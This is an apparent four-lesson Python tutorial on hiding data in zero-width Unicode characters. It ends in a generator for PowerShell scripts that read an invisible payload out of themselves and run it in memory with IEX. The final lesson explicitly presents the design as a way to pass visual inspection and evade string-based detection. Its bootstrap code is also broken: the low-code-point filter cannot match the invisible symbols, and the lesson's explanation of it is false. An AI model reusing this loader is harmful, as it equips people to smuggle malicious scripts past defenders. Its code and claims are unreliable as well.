Ghost Encoder — Course 02

PYTHON 3

// LESSON 01 / 04 — GHOST ALPHABET

The Codebook — 16 Symbols, Zero Width

Your alphabet has exactly 16 characters. They all render as nothing. A 16-character set encodes any nibble (4 bits, 0-15) as one invisible character. Pair two nibbles and you have one byte. That's the whole system.

// FIELD ANALOGY

Invisible ink. The letter looks blank. But under UV light, 16 distinct symbols appear — each marking one hex digit. You write your message in these symbols, append it to a normal-looking letter, and send it. The 16 Unicode zero-width characters are your UV-ink symbols. The host text is your cover letter. GHOST_REVERSE is the UV light.

// NOMENCLATURE — PYTHON DATA STRUCTURES

`\u200B` etc.	Unicode escape sequence: `\u` followed by a 4-digit hex code point. U+200B = ZERO WIDTH SPACE. Invisible in most renderers (no glyph, no advance width). Valid Unicode that normally survives copy-paste and file saves, although some tools strip or normalize format characters.
list literal	`[item, item, ...]`. Ordered sequence, zero-indexed. `GHOST_ALPHABET[4]` returns the 5th character. ORDER IS THE CODEBOOK — swap entries and you break all encoded data.
dict comprehension	`{key: val for var in iterable}`. Builds a dictionary in one expression. Used here to invert the alphabet list into a character→index lookup.
`enumerate(iterable)`	Yields `(index, value)` pairs. `for i, c in enumerate(GHOST_ALPHABET)` gives you both position (0-15) and character simultaneously — exactly what you need to build a reverse map.
`GHOST_REVERSE`	The reverse map: character → index. Given any invisible char, returns its 0-15 value. Built from GHOST_ALPHABET in one line. This is what the decoder uses to reconstruct nibbles.
inline comment `# 0x0`	Python ignores everything after # on a line. These mark which nibble each character encodes. 0x0 = hex zero. Documentation only — not part of the code logic.

// REFERENCE — annotated

GHOST_ALPHABET = [
    '\u200b',  # 0x0: ZERO WIDTH SPACE (index 0 = nibble value 0)
    '\u200c',  # 0x1: ZERO WIDTH NON-JOINER
    '\u200d',  # 0x2: ZERO WIDTH JOINER
    '\u2060',  # 0x3: WORD JOINER
    '\u2061',  # 0x4: FUNCTION APPLICATION
    '\u2062',  # 0x5: INVISIBLE TIMES
    '\u2063',  # 0x6: INVISIBLE SEPARATOR
    '\u2064',  # 0x7: INVISIBLE PLUS
    '\u206a',  # 0x8: INHIBIT SYMMETRIC SWAPPING
    '\u206b',  # 0x9: ACTIVATE SYMMETRIC SWAPPING
    '\u206c',  # 0xA: INHIBIT ARABIC FORM SHAPING
    '\u206d',  # 0xB: ACTIVATE ARABIC FORM SHAPING
    '\u206e',  # 0xC: NATIONAL DIGIT SHAPES
    '\u206f',  # 0xD: NOMINAL DIGIT SHAPES
    '\ufeff',  # 0xE: ZERO WIDTH NO-BREAK SPACE (also used as the byte order mark)
    '\u180e',  # 0xF: MONGOLIAN VOWEL SEPARATOR
]
# Invert list to dict: {char: index}. enumerate gives (0, '\u200b'), (1, '\u200c'), ...
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}

// YOUR MISSION

Write GHOST_ALPHABET (16 \uXXXX escape sequences matching the codebook) and GHOST_REVERSE (one-line dict comprehension reversing it). Exact code points and inline hex comments required.

// WHY THIS WORKS

These code points all belong to Unicode's format-character category (Cf). Most renderers draw nothing for them, and ordinary file I/O and copy-paste usually preserve them, though not every tool guarantees either behaviour. The reverse map gives O(1) lookup during decoding instead of the O(n) scan that `GHOST_ALPHABET.index(c)` would perform. A one-line dict comprehension over enumerate() is idiomatic Python.
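A quick sanity check makes the codebook's two requirements concrete: 16 distinct symbols, and a reverse map that exactly inverts the list. The sketch below rebuilds the alphabet from the code points named in the reference. The helper `check_codebook` is hypothetical and not part of the lesson's code.

```python
import unicodedata

# Code points taken from the reference table, in nibble order 0x0..0xF.
GHOST_ALPHABET = list(
    "\u200b\u200c\u200d\u2060\u2061\u2062\u2063\u2064"
    "\u206a\u206b\u206c\u206d\u206e\u206f\ufeff\u180e"
)
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}


def check_codebook(alphabet, reverse):
    """Hypothetical helper: True if the codebook is well formed."""
    if len(alphabet) != 16:
        return False
    if len(set(alphabet)) != 16:  # a duplicate would make decoding ambiguous
        return False
    # Every index must survive a trip through both lookups.
    return all(reverse[alphabet[i]] == i for i in range(16))


print(check_codebook(GHOST_ALPHABET, GHOST_REVERSE))
# General category of each symbol, as reported by the local Unicode database.
print({unicodedata.category(c) for c in GHOST_ALPHABET})
```

Running a check like this once at import time is cheap and catches a reordered or duplicated entry before any data is encoded with a broken codebook.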

PYTHON 3 — BIT OPS

// LESSON 02 / 04 — ENCODE BYTES

Splitting the Byte — Nibble by Nibble

Every byte is 8 bits. Split it in half: top 4 bits (high nibble) and bottom 4 bits (low nibble). Each nibble is 0-15 — exactly the index range of the 16-character alphabet. Two invisible characters per byte, zero data loss.

// FIELD ANALOGY

You're writing a two-digit hex code in invisible ink. Byte 0xA3: high digit A, low digit 3. Look up digit A: symbol 10. Look up digit 3: symbol 3. Write the two invisible symbols. The recipient reverses it: symbol → digit, pair of digits → byte. Encoding is just splitting. Decoding is just reassembling.
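The 0xA3 example above can be worked through directly in Python. This is only the arithmetic, with no alphabet lookup yet:

```python
byte = 0xA3                   # binary 1010 0011

high = byte >> 4              # 1010 -> 10 (hex digit A)
low = byte & 0x0F             # 0011 -> 3
rebuilt = (high << 4) | low   # shift A back up, OR in 3

print(high, low, hex(rebuilt))  # 10 3 0xa3
```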

// NOMENCLATURE — BIT OPERATIONS

nibble	Half a byte. 4 bits. Holds 0-15. "High nibble" = top 4 bits. "Low nibble" = bottom 4 bits. Two nibbles reconstruct one byte perfectly.
`byte >> 4`	Right shift by 4 positions. Moves bits 4-7 down to positions 0-3. Bottom 4 bits fall off the edge. Result = high nibble as integer 0-15.
`& 0x0F`	Bitwise AND with 0b00001111. Zeroes out top 4 bits, passes bottom 4 unchanged. Result = low nibble as integer 0-15. Also applied after >> as a safety mask.
`for byte in data`	Iterating a `bytes` object yields integers 0-255, not characters. Each iteration gives you one byte as an int you can do bit math on.
`encoded.append()`	Adds to end of list. Two appends per byte (high nibble char first, then low nibble char). Result list is exactly 2× the length of input bytes.
`''.join(encoded)`	Joins list of strings into one string with empty separator. Standard Python — faster than + in a loop, works for any list size.
type annotation	`data: bytes` and `-> str` are documentation hints. Python doesn't enforce them at runtime. They clarify intent: bytes in, invisible string out.

// REFERENCE — annotated

def encode_bytes(data: bytes) -> str:   # bytes in, invisible-encoded string out
    encoded = []
    for byte in data:                    # iterating bytes yields integers 0-255
        high = (byte >> 4) & 0x0F       # shift right 4: high nibble in bits 0-3, masked 0-15
        low = byte & 0x0F              # AND mask: isolate bottom 4 bits → low nibble 0-15
        encoded.append(GHOST_ALPHABET[high])  # high nibble index → invisible char
        encoded.append(GHOST_ALPHABET[low])   # low nibble index → invisible char
    return ''.join(encoded)             # join list → one invisible string

// YOUR MISSION

Write encode_bytes(). Iterate bytes, extract high/low nibbles with bit ops, look each up in GHOST_ALPHABET, append both chars, join and return. Include type annotations.

// WHY THIS WORKS

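The & 0x0F after right-shifting is defensive. For a genuine bytes object it is redundant: every element is 0-255, so byte >> 4 is already 0-15. The type annotation is not enforced at runtime, though, so a caller could pass a list of arbitrary integers, and Python integers have arbitrary precision: 300 >> 4 is 18, which would raise IndexError without the mask. The mask costs one extra operation per byte and guarantees the GHOST_ALPHABET index is always valid (0-15), although out-of-range input still will not round-trip.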
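A short usage sketch shows the 2× length relationship and what the mask does to an out-of-range value. The function is a compact restatement of the reference `encode_bytes()`, and the sample bytes are arbitrary.

```python
GHOST_ALPHABET = list(
    "\u200b\u200c\u200d\u2060\u2061\u2062\u2063\u2064"
    "\u206a\u206b\u206c\u206d\u206e\u206f\ufeff\u180e"
)


def encode_bytes(data: bytes) -> str:
    encoded = []
    for byte in data:
        encoded.append(GHOST_ALPHABET[(byte >> 4) & 0x0F])  # high nibble
        encoded.append(GHOST_ALPHABET[byte & 0x0F])         # low nibble
    return "".join(encoded)


data = b"\xa3\x00\xff"
ghost = encode_bytes(data)

print(len(data), len(ghost))                # 3 6
print([f"U+{ord(c):04X}" for c in ghost])   # code points, since the text itself is invisible

# Outside the byte range the shift alone overflows the index range.
print(300 >> 4, (300 >> 4) & 0x0F)          # 18 2
```

Printing code points rather than the string itself is the practical way to inspect the output, because the encoded text normally renders as nothing.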

PYTHON 3 — REVERSE OPS

// LESSON 03 / 04 — DECODE GHOST

Reading the Invisible — Reassembling Bytes

You receive text that may look normal. Scan every character — keep only ones in the codebook, discard everything else. Pair them: high nibble + low nibble → one byte. All visible text characters fail the codebook test and vanish silently.

// FIELD ANALOGY

UV light reveals only the invisible symbols. The decoder scans every character: visible text → not in GHOST_REVERSE → discard. Invisible symbol → in GHOST_REVERSE → keep. After filtering, pair them: first = high nibble, second = low nibble. Two symbols reconstruct one byte. No length header needed. The structure is self-delineating — pairs always align because the encoder always writes exactly two chars per byte.

// NOMENCLATURE — DECODING + LIST COMPREHENSIONS

list comprehension	`[expr for var in iterable if condition]`. Filters + transforms in one line. The `if` is optional. More readable than a for-loop with if+append. Python optimises it internally.
`c in GHOST_REVERSE`	Dictionary key membership test — O(1). Returns True only if c is in the codebook. All visible ASCII characters fail this test and are silently discarded.
`range(0, len, 2)`	Range with step=2. Generates 0, 2, 4, 6... Processes a list two elements at a time without overlap. Element i = high nibble, element i+1 = low nibble.
`GHOST_REVERSE[char]`	Dictionary lookup: char → nibble index 0-15. The inverse of GHOST_ALPHABET[index]. O(1) lookup, built once at init.
`(high << 4) | low`	Reconstruct the byte. Left-shift high nibble 4 positions back to bits 4-7, then OR in the low nibble. Exact inverse of `(byte >> 4)` and `(byte & 0x0F)`.
`bytes(result)`	Convert list of integers to a bytes object. Each integer must be 0-255. Returns the original decoded binary data.

// REFERENCE — annotated

def decode_ghost(ghost_text: str) -> bytes:
    result = []
    # Filter: keep only chars in the codebook. Visible text gets discarded.
    chars = [c for c in ghost_text if c in GHOST_REVERSE]
    # An odd count means a symbol was lost or added in transit. Drop the
    # unpaired tail so chars[i + 1] below cannot raise IndexError.
    if len(chars) % 2:
        chars = chars[:-1]
    # Process in pairs: [0]+[1]=byte0, [2]+[3]=byte1, etc.
    for i in range(0, len(chars), 2):
        high = GHOST_REVERSE[chars[i]]      # first of pair → high nibble 0-15
        low = GHOST_REVERSE[chars[i + 1]]   # second of pair → low nibble 0-15
        result.append((high << 4) | low)   # shift high to bits 4-7, OR in low → original byte
    return bytes(result)                    # list of ints → bytes

// YOUR MISSION

Write decode_ghost(). Filter to codebook chars only. Iterate pairs with range step=2. Reconstruct each byte with shift + OR. Return as bytes.

// WHY THIS WORKS

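The filter step is what makes Ghost tolerant of added noise. If the encoded text passes through a system that inserts whitespace or line breaks, those characters aren't in GHOST_REVERSE and are silently dropped, so the decoder only processes codebook characters. No framing or length prefix is needed as long as the codebook symbols themselves arrive intact. The scheme cannot recover from a channel that removes a symbol, or from cover text that already contains one (a zero-width joiner inside an emoji sequence, for example): either case shifts the pairing and corrupts every following byte.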
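A round trip makes the filtering behaviour concrete. The sketch below restates the encoder and decoder compactly, hides a short test string behind a cover sentence, then inserts line breaks to imitate a channel that rewraps text. The cover sentence, the sample message, and the choice to drop an unpaired trailing symbol are assumptions made for illustration.

```python
GHOST_ALPHABET = list(
    "\u200b\u200c\u200d\u2060\u2061\u2062\u2063\u2064"
    "\u206a\u206b\u206c\u206d\u206e\u206f\ufeff\u180e"
)
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}


def encode_bytes(data: bytes) -> str:
    return "".join(
        GHOST_ALPHABET[(b >> 4) & 0x0F] + GHOST_ALPHABET[b & 0x0F] for b in data
    )


def decode_ghost(ghost_text: str) -> bytes:
    chars = [c for c in ghost_text if c in GHOST_REVERSE]
    if len(chars) % 2:          # assumption: ignore an unpaired trailing symbol
        chars = chars[:-1]
    return bytes(
        (GHOST_REVERSE[chars[i]] << 4) | GHOST_REVERSE[chars[i + 1]]
        for i in range(0, len(chars), 2)
    )


cover = "Meeting moved to 3pm."
secret = "hello".encode("utf-8")
carrier = cover + encode_bytes(secret)

# Imitate a channel that rewraps text by inserting a newline every 7 characters.
noisy = "\n".join(carrier[i:i + 7] for i in range(0, len(carrier), 7))

print(decode_ghost(carrier) == secret)  # True
print(decode_ghost(noisy) == secret)    # True
print(decode_ghost(cover))              # b'' (no codebook symbols in plain text)
```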

PYTHON 3 — CODE GENERATION

// LESSON 04 / 04 — PS1 BOOTSTRAP

The Self-Decoding Wrapper — One File, Two Layers

The output .ps1 file has two layers: a visible PowerShell bootstrap (reads itself, extracts the hidden payload, decodes and runs it) and the invisible encoded payload appended at the end. No external decoder. The file carries its own key.

// FIELD ANALOGY

The letter is also the decoder. It tells the reader: "scan me, filter for invisible symbols, decode them, execute." The PS1 bootstrap reads itself from disk via $PSCommandPath, extracts the encoded characters, converts to base64, and runs the result with IEX. The invisible payload is appended after the visible code — one .ps1 file is the entire operation.

// NOMENCLATURE — STRING GENERATION + POWERSHELL BOOTSTRAP

`.encode('utf-8')`	Convert Python string to bytes using UTF-8. encode_bytes() operates on bytes, not strings — always encode the PS1 payload text before passing it in.
adjacent string literals	`("line1\n" "line2\n")` — Python automatically concatenates adjacent string literals inside parentheses at compile time. Builds multi-line strings without triple-quotes or explicit +.
`$PSCommandPath`	PowerShell automatic variable. Full path of the currently executing script. The bootstrap uses this to read its own source from disk.
`.ToCharArray()`	Converts string to array of characters. Required to pipe individual chars through `Where-Object` (the `?{...}` filter block).
`[int][char]$_ -lt 33`	Cast char to int, compare to 33. Filters for characters with low Unicode code points. The encoded invisible payload characters fall in a specific range this filter targets.
`IEX`	Invoke-Expression. Executes a string as PowerShell code in the current session. The decoded payload runs in memory — no file written to disk.
`simple_stub + encoded`	Concatenate: visible bootstrap PS1 code + invisible encoded payload. Together they form the final .ps1 file. Bootstrap runs when executed; payload rides invisibly inside.

// REFERENCE — annotated

def generate_ghost_ps1(payload_ps1: str) -> str:
    payload_bytes = payload_ps1.encode('utf-8')   # PS1 text → bytes (encode_bytes needs bytes)
    encoded = encode_bytes(payload_bytes)          # bytes → invisible string via GHOST_ALPHABET
    simple_stub = (
        "# ghost\n"                               # visible PS1 comment — cover story
        "$src = [IO.File]::ReadAllText($PSCommandPath)\n"  # script reads itself from disk
        "$zw = [string]::new(($src.ToCharArray() | ?{[int][char]$_ -lt 33}))\n"  # filter to low-codepoint chars
        "$b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($zw))\n"  # encode filtered chars as base64
        "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)))\n"  # decode + execute in memory
    )
    return simple_stub + encoded  # visible bootstrap + invisible payload = one .ps1

// YOUR MISSION

Write generate_ghost_ps1(). Encode the payload to bytes, run encode_bytes(), build the PS1 stub as adjacent string literals inside parentheses, return stub + encoded payload.

// WHY THIS WORKS

The bootstrap is entirely printable ASCII — passes visual inspection and most string-based detection. The encoded payload is all invisible Unicode — matches no known PowerShell pattern. The file is self-contained: no decoder binary, no external key. One .ps1 file, two invisible layers.

// GHOST ENCODER — COMPLETE

Invisible ink alphabet. Nibble encoder. Reverse decoder. Self-decoding PS1 bootstrap.
Unicode steganography from first principles.
